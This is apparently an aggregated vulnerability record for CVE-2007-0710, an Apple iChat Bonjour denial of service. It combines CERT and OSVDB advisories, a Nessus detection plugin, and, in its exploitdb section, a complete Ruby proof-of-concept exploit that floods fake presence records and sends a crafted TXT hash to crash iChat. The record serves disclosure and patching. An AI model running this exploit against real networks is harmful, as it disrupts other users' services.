ID CVE-2007-0710 Type cve Reporter cve@mitre.org Modified 2008-09-05T21:18:00
Description
The Bonjour functionality in iChat in Apple Mac OS X 10.3.9 allows remote attackers to cause a denial of service (persistent application crash) via unspecified vectors, possibly related to CVE-2007-0614.
{"cert": [{"lastseen": "2019-10-09T19:51:04", "bulletinFamily": "info", "description": "### Overview \n\nA vulnerability in the way Apple iChat handles specially crafted TXT key hashes could lead to denial of service.\n\n### Description \n\nApple [iChat](<http://www.apple.com/macosx/features/ichat/>) is an instant message client for Apple Mac OS X. Apple iChat Agent is a back-end process that manages iChat sessions and available contacts. Apple [Bounjour](<http://developer.apple.com/networking/bonjour/index.html>) is a service provided with Apple Mac OS X that facilitates automatic discovery of computers, devices, and services on IP networks. The iChat Agent uses Bonjour to discover available contacts. The Apple iChat Agent contains a vulnerability that could be exploited when it attempts to handle specially crafted TXT key hashes received via Bonjour messages. According to [ MOAB-29-01-2007](<http://projects.info-pull.com/moab/MOAB-29-01-2007.html>):\n\n_This will instantly cause a SIGTRAP signal to be sent to the process, causing a so-called 'crash'. Further attempts to launch iChat Bonjour functionality again will fail as mDNSResponder keeps the crafted record (and restarting it will be necessary)._ \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker on the same multicast network may be able to cause iChat to crash, thereby creating a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Update**\n\nApple has released an update to address this issue. See Apple Security Update [2007-002](<http://docs.info.apple.com/article.html?artnum=305102>). \n \n--- \n \n### Vendor Information\n\n836024\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Computer, Inc.\n\nUpdated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-002](<http://docs.info.apple.com/article.html?artnum=305102>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23836024 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://projects.info-pull.com/moab/MOAB-29-01-2007.html>\n * <http://secunia.com/advisories/23945/>\n * <http://docs.info.apple.com/article.html?artnum=305102>\n * <http://secunia.com/advisories/24198/>\n * <http://www.apple.com/macosx/features/ichat/>\n * <http://developer.apple.com/networking/bonjour/index.html>\n * <http://securitytracker.com/alerts/2007/Feb/1017661.html>\n * <http://www.securityfocus.com/bid/22304>\n\n### Acknowledgements\n\nThis issue was reported by LMH in MOAB-29-01-2007.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0710](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0710>) \n---|--- \n**Severity Metric:****** | 2.48 \n**Date Public:** | 2007-01-30 \n**Date First Published:** | 2007-02-26 \n**Date Last Updated: ** | 2007-03-16 12:36 UTC \n**Document Revision: ** | 22 \n", "modified": "2007-03-16T12:36:00", "published": "2007-02-26T00:00:00", "id": "VU:836024", "href": "https://www.kb.cert.org/vuls/id/836024", "type": "cert", "title": "Apple iChat fails to properly handle crafted TXT key hashes", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Vulnerability Description\nApple iChat improperly parses TXT key hashes which may allow a remote denial of service. The issue is triggered when the Apple iChat Agent receives a specially crafted TXT key hash via Bonjour triggering a NULL pointer dereference and resulting in a loss of availability for the iChat service.\n## Technical Description\n- Since the exploitation vector is Bonjour, which is a broadcasting service, one can use the exploit to affect a large number of users which can be reached via service advertisements, however, the remote attacker has to be on the same multicast network as the user.\n- A specially crafted TXT key hash sent via the Bonjour service will cause the iChat Agent to raise an exception (SIGTRAP signal 0x9262050b in _NSRaiseError()) due to a NULL pointer dereference.\n- The PoC author noted that this should be considered an issue in Bonjour's mDNSResponder daemon as well since iChat isn't involved in the processing of any mDNS service advertisements. mDNSResponder stops responding shortly after abuse and trying to launch iChat Bonjour functionality again will fail since mDNSResponder keeps the crafted record.\n## Solution Description\nDownload and install Security Update 2007-002 (PPC) via Software Update preferences, or from Apple Downloads, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): \n- Do not use iChat with the Bonjour service.\nor\n- Disable mDNSResponder using the following (by author):\nsudo launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist\nsudo mv /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist \\\n/Users/Shared/com.apple.mDNSResponder.plist.BACKUP\n## Short Description\nApple iChat improperly parses TXT key hashes which may allow a remote denial of service. The issue is triggered when the Apple iChat Agent receives a specially crafted TXT key hash via Bonjour triggering a NULL pointer dereference and resulting in a loss of availability for the iChat service.\n## References:\nVendor Specific Solution URL: http://www.apple.com/support/downloads/securityupdate2007002ppc.html\nVendor Specific News/Changelog Entry: http://docs.info.apple.com/article.html?artnum=305102\nSecurity Tracker: 1017661\n[Secunia Advisory ID:24198](https://secuniaresearch.flexerasoftware.com/advisories/24198/)\n[Related OSVDB ID: 32715](https://vulners.com/osvdb/OSVDB:32715)\n[Related OSVDB ID: 32714](https://vulners.com/osvdb/OSVDB:32714)\nOther Advisory URL: http://projects.info-pull.com/moab/MOAB-29-01-2007.html\nMail List Post: http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html\nGeneric Informational URL: http://developer.apple.com/documentation/Cocoa/Conceptual/NetServices/Articles/about.html\nGeneric Informational URL: http://projects.info-pull.com/moab/MOAB-09-01-2007.html\nGeneric Informational URL: http://projects.info-pull.com/moab/MOAB-20-01-2007.html\nGeneric Informational URL: http://www.apple.com/ichat/\nGeneric Exploit URL: http://projects.info-pull.com/moab/bug-files/MOAB-29-01-2007.rb\n[CVE-2007-0710](https://vulners.com/cve/CVE-2007-0710)\n[CVE-2007-0614](https://vulners.com/cve/CVE-2007-0614)\nCERT VU: 836024\nBugtraq ID: 22304\n", "modified": "2007-01-29T12:00:00", "published": "2007-01-29T12:00:00", "href": "https://vulners.com/osvdb/OSVDB:32713", "id": "OSVDB:32713", "title": "Apple iChat Improper TXT Key Hash Handling DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:01:06", "bulletinFamily": "exploit", "description": "Apple iChat Bonjour 3.1.6.441 Multiple Denial of Service Exploit. CVE-2007-0613,CVE-2007-0614,CVE-2007-0710. Dos exploit for osx platform", "modified": "2007-01-30T00:00:00", "published": "2007-01-30T00:00:00", "id": "EDB-ID:3230", "href": "https://www.exploit-db.com/exploits/3230/", "type": "exploitdb", "title": "Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit", "sourceData": "#!/usr/bin/ruby\n# (c) 2006 Lance M. Havok <lmh [at] info-pull.com>\n# All Rights Reserved.\n# basic proof of concept for MOAB-29-01-2007\n#\n\nrequire 'digest/sha1'\nrequire 'rubygems'\nrequire 'net/dns/mdns-sd'\n\nbugselected = (ARGV[0] || \"0\").to_i\nTMP_ARR = []\nDNSSD = Net::DNS::MDNSSD\n\ntrap(\"INT\") {\n puts \"++ Exiting...\"\n begin\n TMP_ARR.each do |o|\n o.stop\n end\n rescue\n end\n\n exit\n}\n\n#\n# This method abuses a design weakness in iChat Bonjour services, allowing an user\n# to conduct a denial of service attack against reachable clients by registering multiple\n# (fake) _presence records.\n#\ndef oh_gnoes_contact_dos(status_msg = \"ekoC stronS reztleS yrraL\".reverse,\n firstname = 'Pwnies',\n lastname = 'Mgheetacek')\n \n available_status = [ \"avail\", \"away\" ]\n cur_status = available_status[rand(available_status.size)]\n\n # the TXT keys (see http://www.xmpp.org/extensions/xep-0174.html)\n keyset = { \"status\" => cur_status, # - presence availability of the user\n \"msg\" => status_msg, # - user's state\n \"vc\" => \"CUAV!\", # - user's ability for A/V conferencing\n \"1st\" => firstname, # - first name of the user\n \"last\" => lastname, # - last name of the user\n \"txtvers\" => \"1\", # - version of the TXT fields supported\n \"phsh\" => Digest::SHA1.hexdigest(rand(0xffffffff).to_s), # - fake SHA-1 hash of icon\n \"port.p2pj\" => \"1337\" # - Port for link-local communications\n # (ignored).\n }\n\n count = 0\n while true\n rand_str = \"3891ecniSrevoLyaGeipmaerCterceSkecatPreztleSyrraL\".reverse\n (rand_str.length-1).downto(1) do |c|\n n = rand(c) + 1\n rand_str[c], rand_str[n] = rand_str[n], rand_str[c]\n end\n \n puts \"++ Registering presence #{count}\"\n # TODO: add NULL record with user avatar icon (ex. Larry Seltzer's taliban bearded face)\n dos_handle = DNSSD.register(rand_str, '_presence._tcp', 'local', rand(65535), keyset)\n #sleep 40\n TMP_ARR << dos_handle\n count += 1\n end\nend\n\n#\n# This method causes iChat Agent to raise an exception (SIGTRAP signal) with a crafted TXT key hash.\n# Program received signal SIGTRAP, Trace/breakpoint trap.\n# 0x9262050b in _NSRaiseError ()\n#\ndef format_dos()\n keyset = { \"status\" => \"avail\", \"msg\" => \"I'm the Doomed eWook\", \"vc\" => \"CUAV!\", \"1st\" => \"Larry\",\n \"last\" => \"Seltzer\", \"txtvers\" => \"1\", \"phsh\" => (\"\\250\" * 40),\n \"port.p2pj\" => \"1337\" }\n \n rand_str = \"nabilaTAsAlufrewoPsIyrraL\".reverse\n (rand_str.length-1).downto(1) do |c|\n n = rand(c) + 1\n rand_str[c], rand_str[n] = rand_str[n], rand_str[c]\n end\n \n dos_handle = DNSSD.register(rand_str, '_presence._tcp', 'local', rand(65535), keyset)\n dos_handle.stop\nend\n\n#\n# Proof of concept method selection below.\n#\n\nputs \"++ MOAB-29-01-2007: iChat Bonjour Fun\"\nputs \"++ Selected target: #{bugselected}\"\ncase bugselected\n when 0\n format_dos()\n when 1\n if (ARGV[1] and ARGV[2] and ARGV[3])\n oh_gnoes_contact_dos(ARGV[1], ARGV[2], ARGV[3])\n else\n oh_gnoes_contact_dos()\n end\nend\n\n# milw0rm.com [2007-01-30]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3230/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "Multiple problems because of insecure dynamic DNS usage.", "modified": "2007-02-01T00:00:00", "published": "2007-02-01T00:00:00", "id": "SECURITYVULNS:VULN:7140", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7140", "title": "Multiple Apple iChat Bonjour DoS conditions", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-01T02:50:04", "bulletinFamily": "scanner", "description": "The remote host is running a version of Mac OS X 10.4 that does not\nhave Security Update 2007-002 applied. \n\nThis update fixes security flaws in the following applications :\n\n- Finder\n- iChat\n- UserNotification", "modified": "2019-11-02T00:00:00", "id": "MACOSX_SECUPD2007-002.NASL", "href": "https://www.tenable.com/plugins/nessus/24354", "published": "2007-02-16T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(24354);\n script_version (\"1.16\");\n\n script_cve_id(\"CVE-2007-0021\", \"CVE-2007-0023\", \"CVE-2007-0197\", \"CVE-2007-0613\", \"CVE-2007-0614\", \"CVE-2007-0710\");\n script_bugtraq_id(21980, 22146, 22188, 22304);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-002)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update which fixes several\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 that does not\nhave Security Update 2007-002 applied. \n\nThis update fixes security flaws in the following applications :\n\n- Finder\n- iChat\n- UserNotification\" );\n # http://web.archive.org/web/20080110231039/http://docs.info.apple.com/article.html?artnum=305102\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22a97335\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2007-002 :\n\nhttp://www.apple.com/support/downloads/securityupdate2007002universal.html\nhttp://www.apple.com/support/downloads/securityupdate2007002panther.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/15\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\nscript_end_attributes();\n\n script_summary(english:\"Check for the presence of the SecUpdate 2007-002\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n#\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-8]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-00[2-9]|200[89]-|20[1-9][0-9]-)\", string:packages)) \n security_hole(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}
